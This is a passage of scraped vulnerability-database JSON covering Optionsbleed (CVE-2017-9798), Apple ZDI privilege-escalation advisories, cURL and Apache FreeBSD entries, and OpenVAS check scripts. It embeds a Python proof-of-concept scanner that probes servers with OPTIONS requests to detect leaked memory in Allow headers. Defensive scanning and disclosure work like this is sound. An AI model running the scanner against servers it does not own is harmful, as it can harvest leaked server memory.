soon. A patch can [be found here](https://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/core.c?r1=1805223&r2=1807754&pathrev=1807754&view=patch). A patch for Apache 2.2 is [available here](https://blog.fuzzing-project.org/uploads/apache-2.2-optionsbleed-backport.patch) (thanks to Thomas Deutschmann for backporting it).\r\n\r\nUnfortunately the communication with the Apache security team wasn't ideal. They were unable to provide a timeline for a coordinated release with a fix, so I decided to define a disclosure date on my own without an upstream fix.\r\n\r\nIf you run an Apache web server in a shared hosting environment that allows users to create .htaccess files you should drop everything you do right now, update immediately and make sure you restart the server afterwards.\r\n\r\n#### Is this as bad as Heartbleed?\r\n\r\nNo. Although similar in nature, this bug leaks only small chunks of memory and more importantly only affects a small number of hosts by default.\r\n\r\nIt's still a pretty bad bug, particularly for shared hosting environments.", "cvss3": {}, "published": "2017-09-19T00:00:00", "type": "seebug", "title": "HTTP OPTIONS method can leak Apache's server memory(CVE-2017-9798)\n (Optionsbleed)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2017-09-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96537", "id": "SSV:96537", "sourceData": "\n #!/usr/bin/env python3\r\n\r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00f6ck\r\n\r\nimport argparse\r\nimport urllib3\r\nimport re\r\n\r\n\r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Automatically checks http://, https://, http://www. and https://www. -\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n\r\ndup = []\r\n\r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n\r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96537", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "zdi": [{"lastseen": "2022-01-31T21:27:27", "description": "This vulnerability allows local attackers to escalate privileges on vulnerable installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the nsurlstoraged service. The issue results from the lack of proper validation of a reference count, which can result in an integer overflow when incrementing it. An attacker can leverage this vulnerability to escalate privileges under the context of the current service.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-20T00:00:00", "type": "zdi", "title": "Apple macOS nsurlstoraged Integer Overflow Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13833"], "modified": "2017-11-20T00:00:00", "id": "ZDI-17-925", "href": "https://www.zerodayinitiative.com/advisories/ZDI-17-925/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:54:42", "description": "This vulnerability allows remote attackers to escalate privileges on vulnerable installations of Apple Safari. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of ResourceRequest objects. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code under the context of the user.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple Safari UIProcess Out-Of-Bounds Access Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7172"], "modified": "2018-02-07T00:00:00", "id": "ZDI-18-151", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-151/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:54:42", "description": "This vulnerability allows local attackers to escalate privileges on vulnerable installations of Apple iOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the backboardd service. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute code under the context of root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "zdi", "title": "(Pwn2Own) Apple iOS backboardd Double Free Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7162"], "modified": "2018-02-07T00:00:00", "id": "ZDI-18-149", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-149/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:54:39", "description": "This vulnerability allows local attackers to escalate privileges on vulnerable installations of Apple iOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the backboardd service. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute code under the context of root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "zdi", "title": "Apple iOS backboardd Double Free Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7162"], "modified": "2018-02-07T00:00:00", "id": "ZDI-18-154", "href": "https://www.zerodayinitiative.com/advisories/ZDI-18-154/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe cURL project reports:\n\nFTP PWD response parser out of bounds read\nlibcurl may read outside of a heap allocated buffer when doing FTP.\nWhen libcurl connects to an FTP server and successfully logs in\n\t (anonymous or not), it asks the server for the current directory with\n\t the PWD command. The server then responds with a 257 response containing\n\t the path, inside double quotes. The returned path name is then kept by\n\t libcurl for subsequent uses.\nDue to a flaw in the string parser for this directory name, a directory\n\t name passed like this but without a closing double quote would lead to\n\t libcurl not adding a trailing NUL byte to the buffer holding the name.\n\t When libcurl would then later access the string, it could read beyond\n\t the allocated heap buffer and crash or wrongly access data beyond the\n\t buffer, thinking it was part of the path.\nA malicious server could abuse this fact and effectively prevent\n\t libcurl-based clients to work with it - the PWD command is always issued\n\t on new FTP connections and the mistake has a high chance of causing a\n\t segfault.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-10-04T00:00:00", "type": "freebsd", "title": "cURL -- out of bounds read", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254"], "modified": "2017-10-04T00:00:00", "id": "CCACE707-A8D8-11E7-AC58-B499BAEBFEAF", "href": "https://vuxml.freebsd.org/freebsd/ccace707-a8d8-11e7-ac58-b499baebfeaf.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:31", "description": "\n\nThe Fuzzing Project reports:\n\nApache httpd allows remote attackers to read secret data from\n\t process memory if the Limit directive can be set in a user's\n\t .htaccess file, or if httpd.conf has certain misconfigurations,\n\t aka Optionsbleed. This affects the Apache HTTP Server through\n\t 2.2.34 and 2.4.x through 2.4.27. The attacker sends an\n\t unauthenticated OPTIONS HTTP request when attempting to read\n\t secret data. This is a use-after-free issue and thus secret data\n\t is not always sent, and the specific data depends on many factors\n\t including configuration. Exploitation with .htaccess can be\n\t blocked with a patch to the ap_limit_section function in\n\t server/core.c.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-09-18T00:00:00", "type": "freebsd", "title": "Apache -- HTTP OPTIONS method can leak server memory", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "id": "76B085E2-9D33-11E7-9260-000C292EE6B8", "href": "https://vuxml.freebsd.org/freebsd/76b085e2-9d33-11e7-9260-000c292ee6b8.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:34:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-10-21T00:00:00", "type": "openvas", "title": "Fedora Update for curl FEDORA-2017-601b4c20a4", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873507", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873507", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_601b4c20a4_curl_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for curl FEDORA-2017-601b4c20a4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873507\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-21 09:51:54 +0200 (Sat, 21 Oct 2017)\");\n script_cve_id(\"CVE-2017-1000254\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for curl FEDORA-2017-601b4c20a4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'curl'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"curl on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-601b4c20a4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHUFGFYW5CHB262LLZAQLWANLP6KPM5O\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"curl\", rpm:\"curl~7.53.1~11.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-27T18:38:51", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for curl (EulerOS-SA-2017-1288)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000254"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171288", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171288", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1288\");\n script_version(\"2020-01-23T13:52:22+0000\");\n script_cve_id(\"CVE-2017-1000254\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:52:22 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:05:36 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for curl (EulerOS-SA-2017-1288)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\&q

Apple MacOSX Security Updates(HT208331)-02

Description

Related